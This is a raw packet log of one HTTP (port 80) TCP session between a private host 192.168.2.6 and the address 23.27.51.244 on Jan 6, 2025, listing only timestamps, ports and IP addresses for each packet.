Jan 6, 2025 06:03:58.455562115 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.455562115 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.455667019 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.455677986 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.455688000 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.455709934 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.455727100 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.456455946 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.456501007 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.456501961 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.456512928 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.456543922 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.456573009 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.456630945 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.456675053 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.457092047 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.457110882 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.457120895 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.457140923 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.457185984 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.457237959 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.457248926 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.457263947 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.457279921 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.457307100 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.458128929 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.458194971 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.458271027 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.458281994 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.458292007 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.458318949 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.458340883 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.458400965 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.458410978 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.458424091 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.458435059 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.458442926 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.458475113 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.458492041 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.459168911 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.459181070 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.459196091 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.459214926 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.459218025 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.459228992 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.459240913 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.459239960 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.459249973 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.459261894 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.459290981 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.497227907 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.497241020 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.497251034 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.497279882 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.497322083 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.541074991 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.541090012 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.541101933 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.541140079 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.541157961 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.541169882 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.541181087 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.541196108 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.541215897 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.541234970 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.541258097 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.541281939 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.541304111 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.541316032 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.541326046 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.541337013 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.541353941 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.541380882 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.541454077 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.541464090 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.541476011 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.541486025 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.541492939 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.541520119 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.541538954 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.541575909 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.541618109 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.541634083 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.541646004 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.541683912 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.541713953 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.541785002 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.541795015 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.541805029 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.541815042 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.541826010 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.541832924 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.541841030 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.541851997 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.541858912 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.541862011 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.541878939 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.541898012 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.541925907 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.542041063 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.542051077 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.542069912 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.542094946 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.542263985 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.542275906 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.542287111 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.542306900 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.542321920 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.542326927 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.542337894 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.542347908 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.542360067 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.542391062 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.542407036 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.542507887 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.542519093 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.542529106 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.542540073 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.542548895 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.542574883 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.542591095 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.542756081 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.542767048 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.542777061 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.542799950 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.542825937 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.542855024 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.542865992 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.542876959 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.542889118 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.542901039 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.542917013 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.543068886 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.543081045 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.543091059 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.543101072 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.543112040 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.543113947 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.543135881 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.543155909 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.543340921 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.543380976 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.543390989 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.543400049 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.543431044 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.543431997 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.543435097 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.543452024 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.543463945 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.543474913 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.543479919 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.543524981 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.543524981 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.543652058 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.543663025 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.543673992 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.543688059 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.543689966 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.543701887 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.543711901 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.543723106 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.543734074 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.543734074 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.543766022 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.543766022 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.546071053 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.546082973 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.546093941 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.546118021 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.546133995 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.546149969 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.546153069 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.546161890 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.546173096 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.546175003 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.546191931 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.546212912 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.546220064 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.546236038 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.546247005 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.546256065 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.546271086 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.546292067 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.546319008 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.546333075 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.546343088 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.546355009 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.546355963 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.546374083 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.546399117 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.546581984 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.546592951 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.546605110 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.546623945 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.546647072 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.546658039 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.546669006 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.546669960 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.546679974 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.546685934 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.546710968 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.546736002 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.546762943 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.546772957 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.546785116 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.546794891 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.546797037 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.546822071 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.546869040 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.547044039 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.547094107 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.547123909 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.547136068 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.547163963 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.547182083 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.547190905 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.547202110 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.547213078 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.547224998 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.547230959 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.547245979 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.547261953 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.547327995 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.547338009 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.547348976 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.547359943 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.547363043 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.547372103 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.547379017 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.547380924 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.547400951 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.547424078 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.547677994 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.547696114 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.547719955 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.547744989 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.547754049 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.547765017 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.547791958 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.547791004 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.547828913 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.631808996 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.631825924 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.631836891 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.631848097 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.631859064 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.631869078 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.631875992 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.631886959 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.631901026 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.631911039 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.631922007 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.631922960 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.631933928 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.631938934 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.631958008 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.631975889 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.632179976 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.632190943 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.632201910 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.632211924 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.632220984 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.632221937 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.632231951 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.632242918 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.632247925 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.632252932 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.632263899 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.632267952 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.632287025 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.632304907 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.632395029 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.632411003 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.632421017 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.632431984 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.632443905 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.632443905 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.632479906 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.632561922 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.632579088 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.632589102 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.632600069 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.632605076 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.632610083 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.632622957 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.632627010 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.632639885 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.632652044 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.632662058 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.632672071 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.632675886 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.632675886 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.632683039 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.632693052 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.632702112 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.632703066 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.632721901 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.632740021 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.633089066 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.633100033 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.633111000 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.633122921 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.633132935 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.633136034 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.633142948 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.633153915 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.633162022 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.633164883 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.633177042 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.633187056 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.633186102 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.633187056 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.633198977 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.633210897 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.633219004 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.633222103 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.633246899 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.633265972 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.633564949 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.633574963 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.633584976 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.633595943 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.633605957 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.633610964 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.633616924 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.633627892 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.633635044 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.633639097 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.633651018 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.633657932 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.633661032 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.633672953 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.633677959 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.633682966 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.633693933 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.633702040 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.633717060 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.633735895 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.634057999 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.634069920 CET	80	49709	23.27.51.244	192.168.2.6
